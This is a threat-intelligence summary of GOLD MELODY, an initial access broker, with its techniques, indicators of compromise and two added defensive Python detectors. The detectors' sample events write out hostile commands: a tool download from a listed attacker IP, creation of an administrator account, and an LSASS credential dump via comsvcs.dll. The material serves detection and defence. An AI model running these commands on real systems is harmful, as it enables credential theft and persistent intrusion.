GOLD MELODY: PROFILE OF AN INITIAL ACCESS BROKER

Secureworks CTU attributes multiple intrusions to GOLD MELODY, an initial access broker that exploits unpatched internet-facing servers to deploy web shells, backdoors, and tunneling tools before selling access to other criminal groups. Observed tooling and behaviors include web shells, IHS Back-Connect, AUDITUNNEL, TxPortMap, and credential-harvesting with Mimikatz. #GOLD_MELODY #AUDITUNNEL

Keypoints

  • GOLD MELODY obtains initial access by exploiting unpatched internet-facing applications (e.g., Oracle E-Business, WebLogic, Sitecore, Apache Struts, Log4j/FlexNet).
  • Once inside, the group establishes persistence with JSP/ASPX web shells or Perl backdoors (IHS Back-Connect) and creates administrative accounts for ongoing access.
  • Tool staging is consistent: the threat actors create a folder such as C:\Windows\temp\7fde (or a similarly named one) and use Wget or cURL to fetch utilities such as wget.bin, 7-Zip, PuTTY, and TxPortMap.
  • Extensive discovery and lateral-movement activity uses built-in commands (whoami, ipconfig, netstat, net use) and tools such as TxPortMap, pscan2, PAExec, WinExe, and PsExec-like binaries.
  • Credential collection techniques include Mimikatz, LSASS memory dumps via the comsvcs.dll MiniDump export, Responder, and saving registry hives and ntds.dit for offline cracking.
  • Command-and-control and remote access were achieved via reverse shells and SOCKS5 tunnels (IHS Back-Connect, AUDITUNNEL), with observed reuse of C2 infrastructure and IPs that hosted named binaries.
  • Observed exfiltration used PuTTY/PSCP to move large archives (including ntds.dit) to attacker-controlled IPs; defensive detection often interrupted operations before full objective achievement.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – GOLD MELODY exploited unpatched internet-facing servers (‘…exploits internet-facing vulnerabilities as initial access vectors…’).
  • [T1505.003] Web Shell – Used JSP/ASPX web shells for persistence and remote command execution (‘…deployed JSP web shells for persistence…’).
  • [T1136] Create Account – Created local admin accounts via net user and added them to administrators (‘…created a “support” account … net localgroup administrators support /add’).
  • [T1543] Create or Modify System Process – Installed tools and RATs as services (e.g., winexesvc.exe, wmhost.exe) for remote execution (‘…creates a Windows service executable (winexesvc.exe) … executed two binaries (wmhost.exe and winnta.exe) as Windows services’).
  • [T1003] OS Credential Dumping – Harvested credentials via Mimikatz, LSASS memory dumps, saved registry hives and ntds.dit for offline cracking (‘…executed the Mimikatz … dumped the LSASS process memory … saved the Windows System registry hive and the Active Directory database file (ntds.dit)’).
  • [T1021] Remote Services (SMB/Admin Shares) – Lateral movement by mapping admin shares and using net use/SMB to access domain controllers (‘…connected to a domain controller via unknown commands to generate an SMB connection … mapping administrative shares’).
  • [T1105] Ingress Tool Transfer – Downloaded tools to hosts using Wget and cURL for staging and execution (‘…used Wget to download tools to the staging folder’ and ‘cURL command attempting to download IHS Back-Connect backdoor’).
  • [T1041] Exfiltration Over C2 Channel – Exfiltrated data using PuTTY/PSCP to attacker-controlled IPs (‘…observed 3.3 GB of data leaving the network to an attacker-controlled IP address’ via PuTTY Secure Copy Client).
  • [T1070.003] Clear Command History – Attempted anti-forensics by prepending a string to Linux commands to prevent them from being saved to the bash history (‘…string prepended to commands to prevent saving to Bash_History’).
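The techniques above map onto process-creation telemetry that most endpoint sensors already collect. The following is an added example, not code from Secureworks or from the GOLD MELODY tooling it describes: it applies one rule per technique (T1105 staging downloads, T1136 account creation and elevation, T1003 LSASS dumps via comsvcs.dll, T1543 the named service binaries) to Sysmon-style process-creation records. The record field names (image, command_line, parent_image), the four-hex-character staging folder name (generalised from the one observed folder, 7fde) and every sample event are assumptions constructed for the example; the IP in the download command is one of the IOC addresses listed below.

```python
"""
Added example (not Secureworks code): rule-based detection of the
GOLD MELODY post-exploitation behaviours listed in the profile,
evaluated over constructed Sysmon-style process-creation records.
Assumed: field names, the <4 hex chars> staging folder pattern, and
every sample event in SAMPLE_EVENTS.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    technique: str      # ATT&CK ID from the list above
    rule: str           # short rule name
    command_line: str   # offending command line, for the analyst


# T1105: a downloader (curl, wget, or the renamed wget.bin) writing into
# the C:\Windows\temp\<4 hex> staging folder or fetching a staged .bin
STAGING_DIR = re.compile(r"c:\\windows\\temp\\[0-9a-f]{4}\\", re.I)
DOWNLOADER = re.compile(r"(^|\\)(wget|curl)(\.exe|\.bin)?$", re.I)
STAGED_BIN = re.compile(r"\b(wget|txportmap|7z|_mo64)\.bin\b", re.I)
# T1136: local account creation and elevation with net.exe / net1.exe
NET_ADD_USER = re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+(\s+\S+)?\s+/add\b", re.I)
NET_ADMIN_ADD = re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)
# T1003: LSASS dump through the comsvcs.dll MiniDump export (also callable as ordinal #24)
COMSVCS_MINIDUMP = re.compile(r"comsvcs(\.dll)?[,\s]+(#24|minidump)\b", re.I)
# T1543: service binaries named in the profile, started by the service control manager
SERVICE_BINARY = re.compile(r"\\(winexesvc|wmhost|winnta)\.exe$", re.I)


def evaluate(event: dict) -> list[Finding]:
    """Apply every rule to one process-creation event; return the matches."""
    image = event.get("image", "")
    cmd = event.get("command_line", "")
    parent = event.get("parent_image", "")
    hits: list[Finding] = []
    if DOWNLOADER.search(image) and (STAGING_DIR.search(cmd) or STAGED_BIN.search(cmd)):
        hits.append(Finding("T1105", "tool_transfer_to_staging_folder", cmd))
    if NET_ADD_USER.search(cmd):
        hits.append(Finding("T1136", "local_account_created", cmd))
    if NET_ADMIN_ADD.search(cmd):
        hits.append(Finding("T1136", "account_added_to_administrators", cmd))
    if image.lower().endswith("\\rundll32.exe") and COMSVCS_MINIDUMP.search(cmd):
        hits.append(Finding("T1003", "lsass_minidump_via_comsvcs", cmd))
    if SERVICE_BINARY.search(image) and parent.lower().endswith("\\services.exe"):
        hits.append(Finding("T1543", "profile_service_binary_started_by_scm", cmd))
    return hits


def scan(events) -> list[Finding]:
    """Run evaluate() over a sequence of events, preserving event order."""
    return [hit for event in events for hit in evaluate(event)]


def technique_counts(findings) -> dict[str, int]:
    """Number of hits per ATT&CK technique, for a quick triage summary."""
    counts: dict[str, int] = {}
    for finding in findings:
        counts[finding.technique] = counts.get(finding.technique, 0) + 1
    return counts


# Constructed sample telemetry: five malicious events followed by two benign ones.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\temp\7fde\wget.bin",
     "command_line": r"wget.bin http://149.28.207.120/TxPortMap.bin -O C:\Windows\temp\7fde\TxPortMap.bin",
     "parent_image": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\net.exe",
     "command_line": "net user support Passw0rd! /add",
     "parent_image": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\net.exe",
     "command_line": "net localgroup administrators support /add",
     "parent_image": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\Windows\temp\7fde\ls.dmp full",
     "parent_image": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\winexesvc.exe",
     "command_line": r"C:\Windows\winexesvc.exe",
     "parent_image": r"C:\Windows\System32\services.exe"},
    {"image": r"C:\Windows\System32\curl.exe",
     "command_line": "curl.exe https://www.example.org/",
     "parent_image": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\svchost.exe",
     "command_line": "svchost.exe -k netsvcs",
     "parent_image": r"C:\Windows\System32\services.exe"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"{hit.technique} {hit.rule}: {hit.command_line}")
    print(technique_counts(scan(SAMPLE_EVENTS)))
```

The curl event without a staging path and the svchost event produce no findings, which is the point of tying the downloader rule to the staging folder or the staged filenames rather than to curl or wget alone. In a real deployment the net.exe rules are noisy on helpdesk hosts and are best scoped to servers, where an interactive `net user … /add` from a web-server process tree is the signal this profile describes.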

Indicators of Compromise

  • [File hash] Perl reverse shell (bc.pl) – c6c1c3d7e25327a6d46039aa837491e5 (MD5), and additional SHA1/SHA256 hashes listed.
  • [File hash] AUDITUNNEL binary (auditd.bin) – b53063c59d999ff1a6b8b1fc15f58ffc (MD5), and other SHA1/SHA256 hashes.
  • [File hash] Web shell files (2.txt / common_login_bottom2.jsp) – 851aab4341e73f400ab0969cab29298d (MD5), plus other hashes.
  • [Filename] Staged tool names – wget.bin, TxPortMap.bin, 7z.bin, bc.pl (used in tool staging and downloads).
  • [IP address] C2 / hosting infrastructure – 149.28.193.216, 149.28.207.120 (hosts observed serving wget.bin, TxPortMap.bin, bc.pl, and 7z.bin), and other IPs such as 149.28.207.216, 195.123.240.183, 64.190.113.185.

GOLD MELODY’s technical playbook begins with exploiting unpatched, internet-facing applications (examples observed: Oracle E-Business CVE-2016-0545, Sitecore CVE-2021-42237, Apache Struts CVE-2017-5638, Log4j-related CVEs) to gain initial shell access. After exploitation they confirm access (sometimes using the Burp Suite Collabfiltrator extension) and immediately stage tooling in predictable directories (e.g., C:\Windows\temp\7fde or C:\Windows\System32\zh-TW), fetching binaries with Wget/cURL such as wget.bin, TxPortMap.bin, 7z.bin, PSCP/PuTTY components, and custom backdoors (bc.pl).

For persistence and remote control they deploy web shells (JSP/ASPX) or backdoors (Perl IHS Back-Connect, AUDITUNNEL) and install RATs/services (wmhost.exe, winnta.exe/winnta). They perform discovery using built-in commands (whoami, ipconfig, netstat, net user, quser, systeminfo, dir) and scanning tools (TxPortMap, pscan2) to enumerate SMB-accessible hosts, then move laterally via mapped admin shares, PAExec/WinExe, and SMB sessions. Credential harvesting is achieved through Responder, direct /etc/passwd and /etc/shadow access on Linux, dumping LSASS memory (MiniDump via comsvcs.dll), executing Mimikatz (_mo64.bin), and saving registry hives and ntds.dit for offline cracking.

Execution and exfiltration steps use common utilities and covert channels: Wget/cURL for ingress tool transfer, reverse shells and SOCKS5 tunnels for C2 (AUDITUNNEL, IHS Back-Connect), and PuTTY/PSCP to transfer archives (including ntds.dit) to attacker-controlled IPs. The group applies simple anti-forensic measures (prepending a string to commands so they are not written to the bash history) and reuses C2 infrastructure and filenames, which defenders can monitor alongside the listed hashes and IPs to detect and disrupt their operations.
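Because PSCP rides on SSH, the exfiltration step shows up on the network as a large outbound SSH transfer from an internal host to an external address, regardless of what the archive contains. The following is an added example, not Secureworks code: it aggregates constructed flow records per (internal source, external destination) pair over TCP/22 and raises an alert when the destination is one of the IOC addresses listed above or the volume crosses a bulk threshold. The flow record fields (src, dst, dport, bytes_out), the 500 MiB threshold and every record in SAMPLE_FLOWS are assumptions; the three sessions to 149.28.207.216 are constructed to add up to the 3.3 GB figure in the profile.

```python
"""
Added example (not Secureworks code): flagging the bulk SCP/SSH
exfiltration described in the profile from constructed flow records.
Assumed: flow field names, the bulk threshold, and SAMPLE_FLOWS.
"""
import ipaddress
from collections import defaultdict

# Addresses from the Indicators of Compromise section of the profile
KNOWN_ATTACKER_IPS = {
    "149.28.193.216", "149.28.207.120", "149.28.207.216",
    "195.123.240.183", "64.190.113.185",
}
SSH_PORTS = {22}
BULK_THRESHOLD_BYTES = 500 * 1024 * 1024   # 500 MiB per (src, dst); tune per environment


def is_external(ip: str) -> bool:
    """True for globally routable addresses (RFC 1918, loopback, TEST-NET etc. excluded)."""
    return ipaddress.ip_address(ip).is_global


def aggregate_outbound_ssh(flows) -> dict[tuple[str, str], int]:
    """Sum bytes sent per (internal src, external dst) pair over SSH ports."""
    totals: dict[tuple[str, str], int] = defaultdict(int)
    for flow in flows:
        if (flow["dport"] in SSH_PORTS
                and is_external(flow["dst"])
                and not is_external(flow["src"])):
            totals[(flow["src"], flow["dst"])] += flow["bytes_out"]
    return dict(totals)


def flag_exfil(flows) -> list[dict]:
    """Alert on SSH uploads to listed infrastructure or above the bulk threshold."""
    alerts = []
    for (src, dst), total in aggregate_outbound_ssh(flows).items():
        reasons = []
        if dst in KNOWN_ATTACKER_IPS:
            reasons.append("destination listed as GOLD MELODY infrastructure")
        if total >= BULK_THRESHOLD_BYTES:
            reasons.append(f"bulk SSH upload of {total / 1_000_000_000:.1f} GB")
        if reasons:
            alerts.append({"src": src, "dst": dst, "bytes_out": total, "reasons": reasons})
    return sorted(alerts, key=lambda alert: alert["bytes_out"], reverse=True)


# Constructed flow records (src, dst, dport, bytes_out); nothing here is captured traffic.
SAMPLE_FLOWS = [
    # three SCP sessions from a workstation to an IOC address, 3.3 GB in total
    {"src": "10.0.0.5", "dst": "149.28.207.216", "dport": 22, "bytes_out": 1_200_000_000},
    {"src": "10.0.0.5", "dst": "149.28.207.216", "dport": 22, "bytes_out": 1_100_000_000},
    {"src": "10.0.0.5", "dst": "149.28.207.216", "dport": 22, "bytes_out": 1_000_000_000},
    # internal backup over SSH: large, but the destination is not external, so ignored
    {"src": "10.0.0.5", "dst": "10.0.0.10", "dport": 22, "bytes_out": 2_000_000_000},
    # small SSH session to an unlisted external host: below threshold, not flagged
    {"src": "10.0.0.7", "dst": "1.1.1.1", "dport": 22, "bytes_out": 40_000_000},
    # HTTPS upload: not SSH, so out of scope for this rule
    {"src": "10.0.0.7", "dst": "1.0.0.1", "dport": 443, "bytes_out": 900_000_000},
]

if __name__ == "__main__":
    for alert in flag_exfil(SAMPLE_FLOWS):
        print(alert["src"], "->", alert["dst"], alert["bytes_out"], "bytes:", "; ".join(alert["reasons"]))
```

Aggregating per pair rather than per flow matters: the actor can split the archive into several PSCP sessions, each below a per-session threshold, and only the running total reveals the transfer. The IOC match fires independently of volume, so even a small test upload to listed infrastructure is reported.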

Read more: https://www.secureworks.com/research/gold-melody-profile-of-an-initial-access-broker